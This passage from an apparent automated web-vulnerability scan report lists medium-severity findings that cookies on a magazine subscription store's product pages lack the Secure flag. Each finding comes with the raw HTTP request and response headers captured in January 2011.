Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0YY%0a3oIHkEKIKs9o38uGG7kfp27zsKCrzdwCfVBZPklGPhUU1l2AYQ5kNDxv1fiDpfo%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419713%3atrue%3afalse%3a0%3aoNunPdPRwDso5BWF0B3DMK%2b7aGY%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29732

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.10. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Glamour previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_Glamour

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=0000k9muvhPT2T0QGomWys1qLJF:12jnveaj2; Path=/
WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0Yx%0a6YXYjEo1VspU94VyYifd4b8UwcK0sAJJnDw3uxHAP2B5jfTIt7CKmPmh5LMseU4%3d; Path=/
WC_GENERIC_ACTIVITYDATA=[16419654%3atrue%3afalse%3a0%3ayk4TdxcyqY8lQetDPXzNMpgXQ3Y%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_Glamour HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:46:15 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000k9muvhPT2T0QGomWys1qLJF:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:54:55 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0Yx%0a6YXYjEo1VspU94VyYifd4b8UwcK0sAJJnDw3uxHAP2B5jfTIt7CKmPmh5LMseU4%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419654%3atrue%3afalse%3a0%3ayk4TdxcyqY8lQetDPXzNMpgXQ3Y%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29760

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.11. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GolfDigest previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_GolfDigest

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=0000LLoThJrjtgp0dh9gD0ACop5:12jnveaj2; Path=/
WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0Yv%0a6v0E%2bm809ThIzM6ea0oI8DywHeBeNGHjSsQGCNvkAgdRmcAW%2bzbsZ%2fEpEkjt6yQ%3d; Path=/
WC_GENERIC_ACTIVITYDATA=[16419689%3atrue%3afalse%3a0%3aYVf%2b5P0tc2ehV12Qvasx9%2fLJ0y0%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_GolfDigest HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:46:39 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000LLoThJrjtgp0dh9gD0ACop5:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:55:18 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0Yv%0a6v0E%2bm809ThIzM6ea0oI8DywHeBeNGHjSsQGCNvkAgdRmcAW%2bzbsZ%2fEpEkjt6yQ%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419689%3atrue%3afalse%3a0%3aYVf%2b5P0tc2ehV12Qvasx9%2fLJ0y0%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 27700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.12. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GolfWorld previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_GolfWorld

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=0000IM4ZETA2C7Q0vENBBHplaqH:12jnveaj2; Path=/
WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0a8%0abtVlN3ZfToACmNCXnTZXNhHTUY5Da6by4HMXYXoBCmw4ZHIQ7kDdaGdpNFW9q8k%3d; Path=/
WC_GENERIC_ACTIVITYDATA=[16419703%3atrue%3afalse%3a0%3auJNeEFkCmLdxXCBhFMbGZFgwsxY%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_GolfWorld HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:46:48 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000IM4ZETA2C7Q0vENBBHplaqH:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:55:28 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0a8%0abtVlN3ZfToACmNCXnTZXNhHTUY5Da6by4HMXYXoBCmw4ZHIQ7kDdaGdpNFW9q8k%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419703%3atrue%3afalse%3a0%3auJNeEFkCmLdxXCBhFMbGZFgwsxY%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 27910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.13. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Lucky previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_Lucky

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=0000rGo_qi4_LyyOG_1Dh4EcyqB:12jr714ca; Path=/
WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fCn%0aiwEK5mViBuug9h0Y9DHXOJ%2bFWWhqJ9zjJa36rFzEOjK7ezVaLZk6%2fmoed8gyVq0%3d; Path=/
WC_GENERIC_ACTIVITYDATA=[16420067%3atrue%3afalse%3a0%3ahpXIcrDhid5NuOwuZh%2ft4lVsrDY%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_Lucky HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:47:51 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000rGo_qi4_LyyOG_1Dh4EcyqB:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:56:30 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fCn%0aiwEK5mViBuug9h0Y9DHXOJ%2bFWWhqJ9zjJa36rFzEOjK7ezVaLZk6%2fmoed8gyVq0%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16420067%3atrue%3afalse%3a0%3ahpXIcrDhid5NuOwuZh%2ft4lVsrDY%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29740

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.14. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ModernBride previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_ModernBride

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=0000EbGXc6gG6JG7do0YUFhxuVM:12jr714ca; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_ModernBride HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:47:44 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000EbGXc6gG6JG7do0YUFhxuVM:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:56:35 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 350



<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<head>
<title>Generic System Error Test JSP (Item)
...[SNIP]...

8.15. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_NewYorker previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_NewYorker

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=0000qk0-9EmVZgM9368A8xyvtbj:12jr714ca; Path=/
WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fA%2f%0abexFhWTt47e5Mo%2bIUOGLFoXFbZibHImhZP%2fX9oVBOKGt8iW%2bkrypzCBA7zMsTD0%3d; Path=/
WC_GENERIC_ACTIVITYDATA=[16420142%3atrue%3afalse%3a0%3a5E6ldLW5ZALO1tR0oYibLGxRpq0%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_NewYorker HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:48:55 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000qk0-9EmVZgM9368A8xyvtbj:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:57:46 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fA%2f%0abexFhWTt47e5Mo%2bIUOGLFoXFbZibHImhZP%2fX9oVBOKGt8iW%2bkrypzCBA7zMsTD0%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16420142%3atrue%3afalse%3a0%3a5E6ldLW5ZALO1tR0oYibLGxRpq0%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 30082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.16. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Self previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_Self

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=0000Dft1_pxBjhT64qTXywTQT1R:12jr714ca; Path=/
WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fAE%0aGONswVFm2hpNJHAn604U%2ftoCUUE1BDFuNTRos3CBUAShEK4IkYeQeHazq%2bozYow%3d; Path=/
WC_GENERIC_ACTIVITYDATA=[16420087%3atrue%3afalse%3a0%3amBXTv1vHzAp04ze95g3yWJHphRs%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_Self HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:48:03 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000Dft1_pxBjhT64qTXywTQT1R:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:56:54 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fAE%0aGONswVFm2hpNJHAn604U%2ftoCUUE1BDFuNTRos3CBUAShEK4IkYeQeHazq%2bozYow%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16420087%3atrue%3afalse%3a0%3amBXTv1vHzAp04ze95g3yWJHphRs%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.17. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_TeenVogue previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_TeenVogue

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=0000G-x9BjqxoEAPW6PZDfPnvF5:12jr714ca; Path=/
WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fBH%0aLqxAiny5LrVz%2bboJL8AQ0naDA20QdjfAXxC134f7Jz1m3YvhRQzvjNwXQt%2f68io%3d; Path=/
WC_GENERIC_ACTIVITYDATA=[16420099%3atrue%3afalse%3a0%3aYqj2GK49LEs6noC6BEQI39oGsjk%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_TeenVogue HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:48:25 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000G-x9BjqxoEAPW6PZDfPnvF5:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:57:06 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
